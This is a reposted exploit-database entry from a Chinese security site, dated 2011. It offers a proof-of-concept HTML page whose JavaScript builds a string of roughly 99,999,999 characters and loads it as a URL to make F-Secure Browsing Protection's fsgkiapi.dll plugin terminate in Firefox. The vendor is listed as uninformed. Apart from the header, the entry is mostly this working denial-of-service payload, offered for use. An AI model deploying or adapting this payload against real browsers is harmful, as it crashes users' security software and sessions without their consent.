首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC
来源:jimsalimg@msn.com 作者:SeeMe 发布时间:2011-08-17  
==================================================================
F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC
==================================================================

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1                    ####################################              1
#0                    I'm SeeMe  member from Inj3ct0r Team              1
#1                    ####################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[-] F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC
[-] Application : F-secure Browsing Protection
[-] Version : 1.10 / Plugin 9.93
[-] Date 09/Aug/2011
[-] App Homepage : http://www.f-secure.com
[-] Tested on : Mozilla Firefox 5.0 / OS WIN 7-xp
[-] Vendor Status : Uninformed
[-] Vulnerability discovered by SeeMe <jimsalimg@msn.com>
[-] special shouts goes to : r0073r (1337day.com)
[-] L0rd CruSad3r, Th3 RDX, KnocKout
[-] Sid3^effects, Gunslinger_, The Explo!ted
[-] Eidelweiss, Exploit-id team
[-] ZoRLu, Indoushka, Dev-PoinT.com Team Specialy anT!-Tr0J4n
[-] SeeMe WILL BE BACK SOON TO CODE SOME SHIT

----------------
~ fsgkiapi.dll
~ 9.93.16394.20
~ 4c98aa05
~ 40000015
~ 0000f3af
----------------

[-] The app will request the Runtime to terminate it

==================
Proof of Concept 
==================

<html>
<head>

<script type="text/javascript">

function exp (str, num) {
if (!num) return "";
var orig = str,
soFar = [str],
added = 1,
left, i;
while (added < num) {
left = num - added;
str = orig;
for (i = 2; i < left; i *= 2) {
str += str;
}
soFar.push(str);
added += (i / 2);
}
return soFar.join("");

}

var junka = "a";

var junk = exp(junka,99999999);


window.location.href = "http://" + junk;


</script>
</head>

<body>

</body>
</html>

#_END_


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox 3.6.16 mChanne
·Media Player Classic v1.2.1008
·Sagem Router Fast 3304/3464/35
·RealPlayer 12.0.1.660 Stack Ov
·Simple HTTPd 1.42 PUT Request
·RealPlayer 12.0.1.660 Stack Ha
·VLC Media Player 1.1.10 The Lu
·Windows Internet Explorer 9.0.
·Contrexx Shopsystem <= 2.2 SP3
·Wine ( Core exe ) GIF Object M
·D.R. Software Audio Converter
·F-Secure BlackLight 2.2.1092 L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved